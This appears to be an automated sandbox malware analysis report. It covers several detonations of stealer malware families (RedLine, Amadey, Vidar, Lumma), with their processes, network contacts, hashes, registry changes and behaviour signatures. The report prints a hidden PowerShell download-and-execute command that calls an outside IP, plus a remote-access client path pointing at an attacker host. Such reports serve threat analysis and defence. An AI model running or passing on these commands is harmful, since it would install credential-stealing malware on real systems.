C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
"C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta
| MD5 | f0c99a072b3a41e0b07a63772514614a |
| SHA1 | 4149662f98408f25a9726b53bdd16325449f6316 |
| SHA256 | e7cf79e512a9b32c95a626735b09937a6456c1550f0ad39498487543c91116dd |
| SHA512 | 6b0efa113e09f10db718b7f3570920e551bb2c7442e239c00ebf29e601a4abe89ead41860467d823a0b0d0c998c8aacfc6e3a8af994a98d6c0375d77d05128c3 |
\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
| MD5 | 03a574d64f0e62c5e117a5f5acf137e4 |
| SHA1 | 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90 |
| SHA256 | dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747 |
| SHA512 | d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1 |
memory/2804-8-0x0000000006580000-0x00000000069D2000-memory.dmp
memory/2804-13-0x0000000006580000-0x00000000069D2000-memory.dmp
memory/1608-15-0x0000000000B10000-0x0000000000F62000-memory.dmp
memory/1608-16-0x0000000000B10000-0x0000000000F62000-memory.dmp
memory/1608-17-0x0000000000B10000-0x0000000000F62000-memory.dmp
memory/1608-20-0x0000000000B10000-0x0000000000F62000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| GB | 45.155.103.183:1488 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/428-0-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp
memory/428-1-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp
memory/428-2-0x0000016B0F920000-0x0000016B0F972000-memory.dmp
memory/428-3-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-4-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-5-0x00007FF680700000-0x00007FF6808AE000-memory.dmp
memory/428-6-0x0000016B290D0000-0x0000016B291DA000-memory.dmp
memory/428-7-0x0000016B281C0000-0x0000016B281D2000-memory.dmp
memory/428-8-0x0000016B28EE0000-0x0000016B28F1C000-memory.dmp
memory/428-9-0x0000016B28F70000-0x0000016B28FC0000-memory.dmp
memory/428-10-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp
memory/428-11-0x0000016B294D0000-0x0000016B29692000-memory.dmp
memory/428-12-0x0000016B2A4E0000-0x0000016B2AA08000-memory.dmp
memory/428-13-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp
memory/428-14-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-15-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-17-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Reads user/profile data of local email clients
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1980 set thread context of 2956 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 508
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 104.21.74.230:443 | tracnquilforest.life | tcp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
Files
memory/1980-0-0x0000000074BEE000-0x0000000074BEF000-memory.dmp
memory/1980-1-0x0000000000890000-0x00000000008F8000-memory.dmp
memory/2956-3-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-14-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-5-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-12-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-10-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2956-9-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-8-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-7-0x0000000000400000-0x000000000045E000-memory.dmp
memory/1980-15-0x0000000074BE0000-0x00000000752CE000-memory.dmp
memory/2956-16-0x0000000000400000-0x000000000045E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarF35B.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/2956-54-0x0000000000400000-0x000000000045E000-memory.dmp
memory/1980-55-0x0000000074BE0000-0x00000000752CE000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA6tAbC%2fd6IUm5KlyUsecM8wAAAAACAAAAAAAQZgAAAAEAACAAAAD%2bFWnEtXsXf6dv9%2biWS2mb246%2bRvHSvQbUp%2fSFTn0blwAAAAAOgAAAAAIAACAAAADkHLI487uefiU0MIAGiHY4HdRUacWhhdqcpeKLK0S3MqAEAABTEdQ2nm9aw8mWDMrlRhLj9YAw1IOICtN3qYONlpSq6J2mNV55%2fAvzADXO6S4Tmr1q7lF97Rkz%2blaDcqTVA2IHcz5jej3UKDxfYkSEDDirtySp9%2fGe5b1siLBj2pbmkYUMHgvq4IZL%2fLMry%2bGfMf0weSEE%2foBLPuIyIh3ZfQ8SgmNp2Hp2C%2ffhEu3QZfVrjyou9YL8do7jKatydjn9ZiodaC5Pvw3PJAvy%2bOX9KDg8ZgB4wMoqqchqCYNx%2f3yxCQDHCGz1hygzuMOBCSyONUWzeOxjjddpmU3dY08dNa4V9TAAwmVk0J2G2Kg%2fdwxjPnKn%2bIkPIpyNFwcrpzvpo3QAVMy9YzUc4R8Vrkn233x9WWV%2bf0nkucOpj3msl5UMJGrVqb5EMilczPC7D7hS9ynjUeKBi8OnWui2oyY5qiK4oyZcM4v6hGkbj1k4Ie92xpZzBvrj9Fquu%2fmlQbYockpoDyh%2f3st%2f5XOc5NjgEtmzs7zHDw8FrqRV5c8X2JLKwoPH3sg5TdQIZjz%2f5ehl0tHCeeLCQeu4LBnWbtOJ1IGnE1ccKPj%2bWzsP5CKwaHGHtFbRJg3OrHCHnKULTVV2hPgfZThG0lqE199iHP12Cqj9LQdhwMkFwWipvu29MMaZYLf0OxT3rwlBhlbvLA7nqPJXlfLvweIMsViX%2bUJolLM4xs0zu%2fnRyfkNFIdJ9nTztmcaQFLlzuYxkqepiIgOXmkt%2fXfndfcjtzaKo7wNI%2feJaY5eTRBn9BYsNwjvOIf4jWtjpw5NN18ac0hvCQSqeeg6m96SSKysJTp4tUryCokLHbvcxAj%2fZehgcJk7FOiyKAbDci5CXLNGpd70YQkMUW47JvCKJmt78WilpCvrhdR%2b9atel4zuErQf70pXopHA8N7r020%2fz0AUQBo89lQNQr9%2bhminXWES%2fCcxqhJxGvTR%2btzfntNVEM90aK9JTt1AyDB124P9ugoJQGl58pQov%2fgPmt1gOQ25Ck%2f5rZfrJhfZSwOKXkNYwAEuxTUNvz3AtlNBP97jiOuZhAij5Zc7y4kaXsDKSN8Zw9ZwIcQTQXHrfMEaYcwDRIugNjE0wAYsRr5omnCnUaOg819cEydPBl1LKbmRPk6wwdZRs7dZWlO9ST%2bBU3q9cjLiQEQ8rCLoxrlIRtwyCJCoK8S5eUHJwTL1WaJ9N4Ol0JCnW0aIKehufneBFgiIl7yzX%2bqvx68Ao8xnthe26AzpTf3tGqndfnEvIQcwpPALNKFxZCwKPNadpeaR%2fd3VIBYxBa19k%2bxQMLmfn3XaFNOCwfyavO8%2fuP6jk3Ly7s1BcpOjHCof%2fjtSY3VdyJAOlu2XLO6%2bm9Y%2f%2fmmmiTiWUFvZzF9H6alw8AAgZZ8UO7i9rpnVRM8dwzdB0gM7fnGAlkYAqreO09MpdV5FV93DQ5Z13L7Aa9gmmaFPLlaPJWLS8hcQhXiT4bo1oDhBK9qtJNZFM2%2btVjKJhsfG7wuhg6xIofz%2bWvEqRlmYtwzyUt7ZwpiyE5uI%2fASFFBAtD%2fLB5yLcoCQlm1sNXw9alfJOuh6w11zgms461sFVnVoznWiRUtauS%2fmOEG1E1UAAAADtl9q1L%2bRsXIKHuIQg6uVeVTXG624tqRh%2bY3o4d9DQ53iQnwPN6J6dszobqy5sF92DoON2Eg1nn3ORH%2fo8Fa0t&c=test&c=&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | N/A | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | N/A | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\b92cc19684.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\b92cc19684.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
